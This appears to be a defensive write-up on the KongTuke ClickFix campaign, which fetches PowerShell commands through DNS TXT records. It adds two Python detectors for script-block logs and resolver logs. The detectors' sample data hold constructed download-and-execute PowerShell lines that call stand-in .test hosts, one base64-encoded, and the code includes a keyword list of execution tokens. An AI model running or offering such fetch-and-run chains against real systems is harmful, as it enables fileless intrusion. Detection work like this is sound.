Threat actors keep refining their techniques to slip past traditional controls, and the KongTuke group, active since mid-2025, is a clear example: its campaigns pair social engineering with delivery tricks built to avoid the network and endpoint checks that enterprises rely on.
New Tactics in the KongTuke Campaign
KongTuke is best known for its ‘ClickFix’ lure, a social engineering ploy that asks users to "fix" a fabricated web problem. Visitors to a compromised site are shown a fake browser error or a bot-verification prompt and told to copy a command and paste it into the Windows Run dialog (Win+R) or a PowerShell window. Because the victim runs the command themselves, there is no exploit and no malicious file download for browser or gateway controls to catch.
Unit 42 analysts recently reported a change in KongTuke's tradecraft: the group now retrieves its next-stage instructions through DNS TXT records rather than over HTTP. Moving that step into DNS complicates detection, because the lookups blend into the large volume of legitimate DNS traffic that most organisations allow outbound and rarely inspect at the record-content level.
Understanding DNS TXT Record Exploitation
The novelty lies in how the payload is fetched. Rather than downloading a file directly, the initial ClickFix command runs PowerShell that performs a DNS lookup for a specific TXT record. TXT records normally carry strings such as SPF policies or domain-ownership verification tokens; here they carry the command for downloading and executing the final payload.
The technique abuses the fact that DNS is almost universally permitted, even from hosts that cannot reach the web directly, so it is less a vulnerability in DNS than a misuse of a trusted channel. The command extracted from the DNS response is executed in memory rather than written to disk, a ‘fileless’ approach that leaves fewer artifacts for endpoint tools and forensic review. It is not invisible, though: PowerShell Script Block Logging (Event ID 4104) records the script text even when it is run through Invoke-Expression, and the resolver still sees both the TXT query and its answer.
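As an added example, not code from the report or from Unit 42, the following Python sketch shows how the host-side half of that visibility can be used. It scans PowerShell Script Block Logging text (Event ID 4104) for the chain described above: a TXT lookup (Resolve-DnsName -Type TXT, or nslookup -type=txt) combined with in-memory execution (Invoke-Expression, iex, or [scriptblock]::Create). The cmdlets and operators are real PowerShell, but the sample script blocks, the .test domain names and the exact form of KongTuke's command are constructed for the example rather than taken from the campaign. The check also strips PowerShell backtick escapes first, since I`ex and iex are the same cmdlet at run time.

```python
import re
from dataclasses import dataclass

# Constructed PowerShell Script Block Logging entries (Event ID 4104 message text).
# These are not real telemetry; the .test domains are reserved, hypothetical names.
SAMPLE_SCRIPT_BLOCKS = [
    # 0: benign, an admin reading an SPF record
    "Resolve-DnsName -Name example.com -Type TXT | Select-Object Strings",
    # 1: TXT lookup whose joined strings are handed straight to iex
    "$r=Resolve-DnsName -Type TXT -Name cfg.lookup-example.test; iex ($r.Strings -join '')",
    # 2: same chain via nslookup, with a backtick-split cmdlet name to dodge naive matching
    "$t=(nslookup -type=txt stage.lookup-example.test)[-1]; I`nvoke-Expr`ession $t",
    # 3: benign, no DNS involvement
    "Get-Process | Where-Object CPU -gt 100",
    # 4: TXT lookup executed through a scriptblock instead of iex
    "& ([scriptblock]::Create(((Resolve-DnsName -Name x.lookup-example.test -Type TXT).Strings -join '')))",
]

# PowerShell ways of asking for a TXT record (\W? allows a quoted 'TXT')
TXT_VIA_CMDLET = re.compile(r"resolve-dnsname.*?-type\s+\W?txt\b|-type\s+\W?txt\b.*?resolve-dnsname", re.S)
TXT_VIA_NSLOOKUP = re.compile(r"nslookup.*?-(?:type|q|querytype)=\W?txt\b|-(?:type|q|querytype)=\W?txt\b.*?nslookup", re.S)
# Ways of turning a string into running code without writing a file
IN_MEMORY_EXEC = re.compile(r"invoke-expression|\biex\b|\[scriptblock\]::create\(")


def normalize(script: str) -> str:
    # A backtick inside an identifier is a PowerShell escape that leaves the name
    # unchanged at run time (I`ex is still iex), so strip them before matching.
    return script.replace("`", "").lower()


@dataclass
class Verdict:
    index: int
    txt_lookup: bool
    in_memory_exec: bool

    @property
    def suspicious(self) -> bool:
        # Either behaviour alone is common; both in one script block is the signal.
        return self.txt_lookup and self.in_memory_exec


def classify(index: int, script: str) -> Verdict:
    s = normalize(script)
    lookup = bool(TXT_VIA_CMDLET.search(s) or TXT_VIA_NSLOOKUP.search(s))
    execute = bool(IN_MEMORY_EXEC.search(s))
    return Verdict(index, lookup, execute)


def scan(blocks) -> list[Verdict]:
    return [v for i, b in enumerate(blocks) if (v := classify(i, b)).suspicious]


if __name__ == "__main__":
    for v in scan(SAMPLE_SCRIPT_BLOCKS):
        print(f"script block {v.index}: TXT lookup chained into in-memory execution")
```

Run as-is it flags blocks 1, 2 and 4 and leaves the admin's SPF check alone, because a TXT lookup on its own is ordinary; it is the lookup feeding an in-memory execution primitive in the same script block that is worth an alert. In production the same two predicates map onto a SIEM query over 4104 events, and the block-level correlation is what keeps the false-positive rate tolerable.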
Implications and Defensive Strategies
The end goal of these attacks is to deploy follow-on malware such as the Interlock remote access trojan, giving the operators persistent access inside the network. Because the stager's key step happens over DNS, defenders whose visibility centres on HTTP proxies and web filtering will not see it.
To counter this, experts recommend blocking newly registered domains, watching DNS traffic for irregularities (TXT queries from ordinary workstations are relatively uncommon outside mail and admin tooling, and long or script-like TXT answers are a strong signal), and reviewing PowerShell execution logs for scripts that perform DNS lookups and feed the result into Invoke-Expression. Together these measures cover the delivery domain, the lookup and the execution step of the chain.
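The resolver-side check, as an added example that is not code from the article or from Unit 42: parse resolver log lines, reassemble multi-string TXT answers and look for script-like content. It goes slightly beyond the text in also trying to base64-decode long answers, both as UTF-8 and as the UTF-16LE form PowerShell's -EncodedCommand expects, since an operator who wants to hide a command in a TXT record has an obvious incentive to encode it. The key=value log format, the .test domains and the TXT contents are all constructed for this example.

```python
import base64
import re

# Everything below is constructed for this example: a key=value resolver log format,
# hypothetical .test domains, and TXT contents written to illustrate the two things a
# detector has to handle (multi-string answers and base64-encoded commands).
SNIPPET = "IEX (New-Object Net.WebClient).DownloadString('https://lookup-example.test/p')"
ENCODED = base64.b64encode(SNIPPET.encode("utf-16le")).decode()  # as -EncodedCommand would carry it

SAMPLE_DNS_LOG = (
    'ts=2025-09-01T10:00:01Z client=10.1.4.22 qname=example.com qtype=TXT rcode=NOERROR rdata="v=spf1 include:_spf.example.com -all"\n'
    'ts=2025-09-01T10:00:05Z client=10.1.4.22 qname=www.example.com qtype=A rcode=NOERROR rdata=93.184.216.34\n'
    # a TXT answer split into three character-strings; no single chunk contains a whole keyword
    'ts=2025-09-01T10:00:09Z client=10.1.4.57 qname=cfg.lookup-example.test qtype=TXT rcode=NOERROR '
    'rdata="$c=(New-Object Net.WebClient).Download" "String(\'https://lookup-example.test/s2\');Invoke-Expr" "ession $c"\n'
    f'ts=2025-09-01T10:00:12Z client=10.1.4.57 qname=k.lookup-example.test qtype=TXT rcode=NOERROR rdata="{ENCODED}"\n'
    'ts=2025-09-01T10:00:15Z client=10.1.4.90 qname=_dmarc.example.com qtype=TXT rcode=NOERROR rdata="v=DMARC1; p=reject"\n'
)

LINE_RE = re.compile(
    r"^ts=(?P<ts>\S+) client=(?P<client>\S+) qname=(?P<qname>\S+) "
    r"qtype=(?P<qtype>\S+) rcode=(?P<rcode>\S+) rdata=(?P<rdata>.*)$"
)
# Substrings that rarely appear in legitimate TXT data (SPF, DKIM, DMARC, verification tokens)
TOKENS = ("invoke-expression", "invoke-webrequest", "downloadstring",
          "frombase64string", "-encodedcommand", "mshta", "powershell")
IEX_RE = re.compile(r"\biex\b")
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def parse_line(line: str):
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    # A TXT answer may hold several <=255-byte character-strings; keep them separately here
    rec["chunks"] = re.findall(r'"([^"]*)"', rec["rdata"])
    return rec


def find_tokens(text: str) -> set[str]:
    t = text.lower()
    found = {tok for tok in TOKENS if tok in t}
    if IEX_RE.search(t):
        found.add("iex")
    return found


def decoded_views(text: str) -> list[str]:
    # Decode any long base64 run as UTF-8 and, if even-length, as UTF-16LE (-EncodedCommand)
    views = []
    for m in B64_RE.finditer(text):
        try:
            raw = base64.b64decode(m.group(0), validate=True)
        except ValueError:
            continue
        views.append(raw.decode("utf-8", errors="ignore"))
        if len(raw) % 2 == 0:
            views.append(raw.decode("utf-16le", errors="ignore"))
    return views


def scan_dns_log(log_text: str) -> list[dict]:
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["qtype"] != "TXT":
            continue
        joined = "".join(rec["chunks"])  # reassemble first, or keywords split across chunks are missed
        tokens = find_tokens(joined)
        for view in decoded_views(joined):
            tokens |= find_tokens(view)
        if tokens:
            findings.append({"client": rec["client"], "qname": rec["qname"], "tokens": sorted(tokens)})
    return findings


if __name__ == "__main__":
    for f in scan_dns_log(SAMPLE_DNS_LOG):
        print(f'{f["client"]} -> {f["qname"]} TXT: {", ".join(f["tokens"])}')
```

The two lookups from 10.1.4.57 are flagged and the SPF and DMARC records are not. Matching per chunk instead of on the joined string would miss the first one entirely, which is why the reassembly step comes before any pattern matching; the same applies to whatever passive-DNS or dnstap source feeds a real pipeline.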
